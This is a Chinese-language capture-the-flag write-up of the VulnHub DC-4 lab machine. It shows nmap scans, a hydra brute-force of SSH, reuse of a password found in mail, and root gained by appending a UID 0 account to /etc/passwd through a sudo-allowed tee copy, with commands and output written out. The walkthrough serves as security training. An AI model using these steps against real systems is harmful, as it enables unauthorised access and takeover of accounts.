信息收集:
yurang@kali:~$ nmap -sn 192.168.76.1/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 21:52 CST

Nmap scan report for 192.168.76.129

Host is up (0.0044s latency).

Nmap scan report for 192.168.76.131

Host is up (0.0038s latency).

Nmap done: 256 IP addresses (2 hosts up) scanned in 19.71 seconds

yurang@kali:~$ nmap -A 192.168.76.131

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 21:53 CST

Nmap scan report for 192.168.76.131

Host is up (0.00055s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

| ssh-hostkey:

|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)

|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)

|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)

80/tcp open  http    nginx 1.15.10

|_http-server-header: nginx/1.15.10

|_http-title: System Tools

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
开放了SSH和Web,先访问Web页面:
没有sql注入,尝试暴力破解:
得到密码happy,进入Web
可以执行命令,通过拦截请求包实现任意命令执行。尝试创建文件、修改当前文件写入一句话失败。nc反弹shell权限太低。查看passwd看到3个有home目录的用户。
在jim的home目录下发现backups文件,其中有密码文件:
 
将其读取出来存为字典,用来尝试爆破jim的SSH密码:
root@kali:/home/yurang# hydra -l jim -P pass.txt ssh://192.168.76.131

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task

[DATA] attacking ssh://192.168.76.131:22/

[STATUS] 177.00 tries/min, 177 tries in 00:01h, 76 to do in 00:01h, 16 active

[22][ssh] host: 192.168.76.131   login: jim   password: jibril04

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at
得到密码jibril04,使用该密码SSH登录靶机:
[C:\~]$ ssh jim@192.168.76.131

Connecting to 192.168.76.131:22...

Connection established.

To escape to local shell, press 'Ctrl+Alt+]'.

Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

You have mail.

Last login: Thu Aug  6 09:40:40 2020 from 192.168.76.129

/usr/bin/xauth:  file /home/jim/.Xauthority does not exist

jim@dc-4:~$ ls /var/mail/

jim

jim@dc-4:~$ ls -l /var/mail/

total 4

-rw-rw---- 1 jim mail 715 Apr  6  2019 jim
提示有新邮件,阅读邮件得到用户charles的密码:

jim@dc-4:~$ more /var/mail/jim

From charles@dc-4 Sat Apr 06 21:15:46 2019

Return-path: <charles@dc-4>

Envelope-to: jim@dc-4

Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000

Received: from charles by dc-4 with local (Exim 4.89)

    (envelope-from <charles@dc-4>)

    id 1hCjIX-0000kO-Qt

    for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000

To: jim@dc-4

Subject: Holidays

MIME-Version: 1.0

Content-Type: text/plain; charset="UTF-8"

Content-Transfer-Encoding: 8bit

Message-Id: <E1hCjIX-0000kO-Qt@dc-4>

From: Charles <charles@dc-4>

Date: Sat, 06 Apr 2019 21:15:45 +1000

Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,

Charles
在jim用户中执行sudo -l查看其具有sudo权限的命令,没有:
jim@dc-4:~$ sudo -l

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.

    #2) Think before you type.

    #3) With great power comes great responsibility.

[sudo] password for jim:

Sorry, user jim may not run sudo on dc-4.

jim@dc-4:~$
将用户切换到Charles:
charles拥有不需要root密码即可以root身份执行的teehee命令权限:
charles@dc-4:/home/jim$ sudo -l

Matching Defaults entries for charles on dc-4:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:

    (root) NOPASSWD: /usr/bin/teehee

charles@dc-4:/home/jim$
而teehee的作用是可以向文件中追加内容:
charles@dc-4:/home/jim$ teehee --help

Usage: teehee [OPTION]... [FILE]...

Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite

  -i, --ignore-interrupts   ignore interrupt signals

  -p                        diagnose errors writing to non pipes

      --output-error[=MODE]   set behavior on write error.  See MODE below

      --help     display this help and exit

      --version  output version information and exit

MODE determines behavior with write errors on the outputs:

  'warn'         diagnose errors writing to any output

  'warn-nopipe'  diagnose errors writing to any output not a pipe

  'exit'         exit on error writing to any output

  'exit-nopipe'  exit on error writing to any output not a pipe

The default MODE for the -p option is 'warn-nopipe'.

The default operation when --output-error is not specified, is to

exit immediately on error writing to a pipe, and diagnose errors

writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>

Full documentation at: <http://www.gnu.org/software/coreutils/tee>

or available locally via: info '(coreutils) tee invocation'
使用mkpasswd生成一个密码(https://www.cnblogs.com/backlion/p/10503978.html):
root@kali:/home/yurang# mkpasswd -m SHA-512 12345

$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0

root@kali:/home/yurang#
构造一行passwd用户信息:
test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:test:/root:/bin/bash
使用sudo teehee成功将用户test写入passwd中:
charles@dc-4:/home/jim$ sudo teehee -a /etc/passwd

test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:/root/root:/bin/bash

test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:/root/root:/bin/bash

^C

charles@dc-4:/home/jim$ more /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

_apt:x:104:65534::/nonexistent:/bin/false

messagebus:x:105:109::/var/run/dbus:/bin/false

sshd:x:106:65534::/run/sshd:/usr/sbin/nologin

nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash

jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash

sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

Debian-exim:x:108:112::/var/spool/exim4:/bin/false

test:$6$qwK19pMRSUWqanoj$GjN71wScgFYrZLan.1mDFYvhPmalxzeBSptWrervQXLeuM9ZnnTi2FupYnlMEccb1UioDCo9AI2LH46tSkmnn0:0:0:/root/root:/bin/bash
切换成test用户,得到root权限:
charles@dc-4:/home/jim$ su test

Password:

# whoami

root

# vi /root/flag.txt

888       888          888 888      8888888b.                             888 888 888 888

888   o   888          888 888      888  "Y88b                            888 888 888 888

888  d8b  888          888 888      888    888                            888 888 888 888

888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888

888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888

88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P

8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "

888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888

Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those

who have provided feedback, and who have taken time to complete these little

challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
 
 
 
 
 
 
 
 

vulnhub: DC 4的更多相关文章

  1. vulnhub: DC 9

    信息收集: root@kali:/opt/test# nmap -A -v 192.168.76.137 Starting Nmap 7.80 ( https://nmap.org ) at 2020 ...

  2. vulnhub: DC 3

    通过nmap扫描,只开放了80端口,并且该web服务是基于Joomla搭建: root@kali:~# nmap -A 192.168.74.140 Starting Nmap 7.80 ( http ...

  3. vulnhub靶机之DC6实战(wordpress+nmap提权)

    0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...

  4. Vulnhub靶场DC-1 WP

    前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...

  5. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  6. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

  7. Vulnhub dc-4靶机通关

    Vulnhub dc-4靶机通关 下载地址:https://download.vulnhub.com/dc/DC-4.zip 安装好dc-4靶机 使用局域网查看器扫描到ip地址 端口扫描,发现运行了8 ...

  8. LDAP 中 CN, OU, DC 的含义

    1. LDAP的存储规则 区分名(DN,Distinguished Name) 和自然界中的树不同,文件系统/LDAP/电话号码簿目录的每一片枝叶都至少有一个独一无二的属性,这一属性可以帮助我们来区别 ...

  9. 【关于HBITMAP, DC, MEM DC, Clipboard】将HBITMAP拷贝到Clipboard(Windows Clipboard & OLE Clipboard)

    参考: Programming Windows with MFC, 2nd. Chapter 18, 19. 建议把这两章学习完(至少到OLE drag-and-drop之前要学习完)再来尝试OLE ...

随机推荐

  1. Vue基础(2)

    fetch与axios请求数据 fetch基本语法: fetch(url,{parmas}).then(res=> res.json()  //返回promise对象 ).then(data=& ...

  2. Java IO相关使用

    date: 2020-06-14 14:42:22 updated: 2020-08-21 17:35:45 Java IO相关使用 1. 文件 创建 File 对象的三种方式 一个路径名:File( ...

  3. 微信小程序picker组件两列关联使用方式

    在使用微信小程序picker组件时候,可以设置属性   mode = multiSelector   意为多列选择,关联选择,当第一列发生改变时侯,第二列甚至第三列发生相应的改变.但是官方文档上给的只 ...

  4. 02 HTML 常见标记 选择器 样式

    no.02今天主要学习了在web中的HTML CSS,并在其中制作了明信片,在制作明信片途中有几个知识点需要总结:1.HTML 全称hyper text markup language 超文本标记语言 ...

  5. Github优质库分享-01算法小抄 基于LeetCode

    Github 优质库分享-01 算法小抄 该库总共 60 多篇原创文章,都是基于 LeetCode 的题目,涵盖了所有题型和技巧,而且一定要做到举一反三,通俗易懂,绝不是简单的代码堆砌. 目前 sta ...

  6. MongoDB下载安装与配置

    一.下载与安装 1.进入mongodb官网,try->download->community找到下载.或者直接在地址栏输入:https://www.mongodb.com/try/down ...

  7. python造一个计算器

    正则表达式之简易计算器 关注公众号"轻松学编程"了解更多. 需求:使用正则表达式完成一个简易计算器. 功能:能够计算简单的表达式. 如:12((1+2)/(2+3)+1)*5.1- ...

  8. git/SQL/正则表达式的在线练习网站

    虽说我没事就喜欢喷应试教育,但我也从应试教育中发现了一个窍门:如果能够以刷题的形式学习某项技能,效率和效果是最佳的.对于技术的学习,我经常面临的困境是,理论知识知道的不少,但是有的场景实在无法模拟,缺 ...

  9. Redis 和 Memcached 有什么区别?Redis 的线程模型是什么?为什么单线程的 Redis 比多线程的 Memcached 效率要高得多?

    面试题 redis 和 memcached 有什么区别?redis 的线程模型是什么?为什么 redis 单线程却能支撑高并发? 面试官心理分析 这个是问 redis 的时候,最基本的问题吧,redi ...

  10. 动态规划——用二进制表示集合的状态压缩DP

    动态规划当中有非常常见的一个分支--状态压缩动态规划,很多人对于状态压缩畏惧如虎,但其实并没有那么难,希望这文章能带你们学到这个经典的应用. 二进制表示状态 在讲解多重背包问题的时候,我们曾经讲过二进 ...